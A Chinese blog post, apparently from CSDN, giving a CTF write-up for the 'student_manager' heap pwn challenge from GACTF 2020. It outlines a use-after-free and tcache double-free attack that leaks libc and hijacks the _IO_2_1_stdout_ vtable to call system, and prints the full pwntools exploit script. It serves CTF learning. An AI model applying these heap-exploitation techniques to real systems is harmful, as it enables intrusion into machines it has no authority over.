[BMZCTF-pwn] 47-gactf2020-student_manager

最新推荐文章于 2023-05-11 21:00:45 发布
最新推荐文章于 2023-05-11 21:00:45 发布
阅读量146 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123070035
版权

hook动态刷新,本以为不难,将free_hook改为system再free后发现没了。搜到exp才第一次知道动态刷新。

只能建0x24, 结构:+0:4字节score, +0x18:7字节name, +0x20:4字节id(相当于索引,通过id查)

解题思路:

  1. 先获得堆地址,由于有UAF,释放两个再show就行
  2. 通过doublefree将块建到tcache+8,在这里写0xFF (tcache 0xb0块计数器)
  3. 在第1个块+0x18位置写个b1(剩余半块和后边3个0x31一起释放得到libc)
  4. 将块建到第1个块+0x20处释放得到libc
  5. 将块建到tcache+0x40在tcache+0x58处写入_IO_2_1_stdout_ +0xd0 在+0xe8处写入system
  6. 同上步在_IO_2_1_stdout_ +0xd0处写入_IO_file_jumps+0x98 (不大明白,但就是这个地方)name为';sh
  7. 当输出name时执行system(XXXX';sh)

测试结果:

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

def connect(local=1):
    global p
    
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('node4.buuoj.cn', 27672) 

libc_elf = ELF('/home/shi/libc6_2.27-3ubuntu1/lib/x86_64-linux-gnu/libc-2.27.so')
one = [0x4f2c1,0x4f322,0x10a38c]
libc_start_main_ret = 0x21b97
context(arch='amd64')

menu = b"choice:"
def add(idx, name, score):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"student's id:", str(idx).encode())
    p.sendlineafter(b"student's name:", name)
    p.sendlineafter(b"student's score:", str(score).encode())

def free(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"student's id:", str(idx).encode())

def show(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"student's id:", str(idx).encode())

def pwn():
    context.log_level = 'debug'

    for i in range(10):
        add(i, b'A', 0x21)
    free(0)
    free(1)
    show(1)
    p.recvuntil(b'score:')
    heap_addr = int(p.recvline()) - 0x13290
    print('head:', heap_addr)
    
    free(1)
    add(18, b'A', heap_addr + 0x18)
    add(19, b'A', 0x21)
    add(20, b'A', 0xffff) #tcache 0xb0 cnt=0xff

    free(2)
    free(3)
    free(3)
    add(21, b'A', heap_addr + 0x13298)
    add(22, b'A', 0x21)
    add(23, b'A', 0xb1)  #score = 0xb1 

    free(4)
    free(5)
    free(5)
    add(24, b'A', heap_addr + 0x132a0)
    add(25, b'A', 0x21)
    add(26, b'A', 0)
    free(26)
    show(0x41)
    p.recvuntil(b'name:')
    libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x60 -0x10 - libc_elf.sym['__malloc_hook']
    libc_elf.address = libc_base
    one_gadget= libc_base + one[2]     
    print('libc:', hex(libc_base))

    #ubuntu18 libc-2.27 hook动态刷新,劫持 _IO_2_1_stdout_ 
    free(6)
    free(6)
    free(7)
    free(7)
    add(27, b'A', heap_addr + 0x40)
    add(28, b'A', 0)
    add(29, p64(libc_elf.sym['_IO_2_1_stdout_']+ 0xd0)[:-1], 0)
    add(30, p64(libc_elf.sym['system'])[:-1], 0)  #_IO_2_1_stdout_+0xe8 = system

    free(8)
    free(8)
    free(9)
    free(9)
    add(31, b'A', heap_addr + 0x40)
    add(32, b'A', 0)
    add(33, p64(libc_elf.sym['_IO_2_1_stdout_']+ 0xd8)[:-1], 0)
    fake_vtable = (libc_elf.sym['_IO_file_jumps'] + 0x98) & 0xffffffff
    print('fake:', hex(fake_vtable))
    add(0,b"';sh", (fake_vtable-0x100000000)) #_IO_2_1_stdout_+0xf0 = ';sh _IO_2_1_stdout_+0xd0 = _IO_file_jumps+0x98
    p.recv()
    sleep(0.2)
    p.sendline(b'cat /flag')
    p.interactive()

connect(1)
pwn()

石氏是时试
关注
专栏目录
BUUCTF-PWN刷题记录-10
weixin_44145820的博客
04-19 860
目录wustctf2020_number_game(neg操作原理)zctf2016_note2(强制转换溢出,unlink)wustctf2020_name_your_cat wustctf2020_number_game(neg操作原理) 需要输入一个数,变为负数之后还是负数 这题就设计计组知识了,neg的操作为按位取反+1,而0x80000000取反加一之后仍然是0x80000000,所以...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
[BUUCTF-pwn] [OGeek2019]0day_manager
weixin_52640415的博客
01-25 2435
事出反常必有妖。结构很多,不过3个基本差不多。一般菜单题也就是add,show,free这里多了个handle all 这里边允许输入删除的个数。但是这里边前半部分用的do循环,后半用的while循环。跃然通过条件判断大多数情况下可以正常运行,显然当输入0时前边会执行1次,而后边不执行。也就是堆块free了,管理指针块未清除,有UAF漏洞。 case 2: for ( i = *(_QWORD **)(*(_QWORD *)(qword_203050 + 8) + 8LL); i;
[BMZCTF-pwn] 48_gactf2020-vmpwn
weixin_52640415的博客
02-24 1060
虚拟机太麻烦了,有一块不明白看了个exp,但是明显这个exp的命令格式不对。但大意明白了。 为防自己以后不明白,把说明写到注释里。也就不用写别的了。全在代码里了。 from pwn import * local = 1 if local == 1: p = process('./pwn') else: p = remote('1.1.1.1', 28546) libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-
[BMZCTF-pwn] 22-pwn1
weixin_52640415的博客
02-16 174
昨天整了第一届BMZCTFpwn题,都来得及写。这一届一共五个pwn题,难度逐个增加。 第一个是个32位no pie,got表可写。程序很短,直接调用无格式参数的printf,而且有循环,got表还有system项。基本属于无障碍型。 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char s[100]; // [esp+18h] [ebp-70h] BYREF unsigned i
[BMZCTF-pwn] 20-secret_file
weixin_52640415的博客
02-15 2820
栈内溢出的题 读完程序也就完事了 __int64 __fastcall main(int a1, char **a2, char **a3) { char *v3; // rax unsigned __int8 *v4; // rbp char *v5; // rbx __int64 v6; // rcx char *v7; // rdi unsigned int v8; // er12 FILE *v9; // rbp size_t v11; // [rsp+0h]
[BMZCTF-pwn] 00-pwnpwnpwn
weixin_52640415的博客
02-11 1246
BUUCTF的题作到0解区,既作不出来也找到不wp,放弃了。今天开始上xctfclub.cn上来玩。 一般题都是从简单开始,也不一定,一上来就是个盲pwn 。 远程连接后,输出欢迎信息,然后输入后会回显。 思路: 如果是堆啥的怎么也得给点,不给就没办法了,至少有个泄露。这里的回显猜是printf的输出用AAAA-%x-%x...测试,可以得到一些有用信息 有0804XXXX这个应该是32位no pie #3 得到个栈地址指向输入串,不清楚怎么用, #10是输入偏移 #39是libc_s
[BMZCTF-pwn] 12-csaw-ctf-2016-quals hungman
weixin_52640415的博客
02-13 2551
这个题猜还是2.23 (都不打算作了,这上边的题都没有远程环境,而且这些好像作过了) 这是个懵字游戏数据结构是这样的: chunk0 写输入的名字最大0xf8(可以小) 程序记录:4字节记录,4字节名字长度,8字节名字chunk0的指针 和名字一样长的随机数 先输入名字,然后行成随机数,然后等输入字符,如果有相同就计分,一共26个全输上怎么也能相同了,当超过最高记录就可修改名字(这里有溢出) puts("High score! change name?"); __isoc
CTF-PWN学习-为缺少指导的同学而生
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 2658
攻防世界的格式化字符串漏洞利用,简单题
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
多媒体素材库系统 基于Springboot和Mysql的多媒体素材库系统代码(程序,中文注释)
09-27
多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统-多媒体素材库系统 1、资源说明:多媒体素材库系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBo
PyOpenGL-3.1.5.tar.zip
最新发布
09-27
opengl安装包
Qt内置图标,独立头文件
09-27
Qt内置图标,独立头文件
医疗报销系统代码系统 Springboot医疗报销系统(程序,中文注释)
09-27
医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统-医疗报销系统 1、资源说明:医疗报销系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDE
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值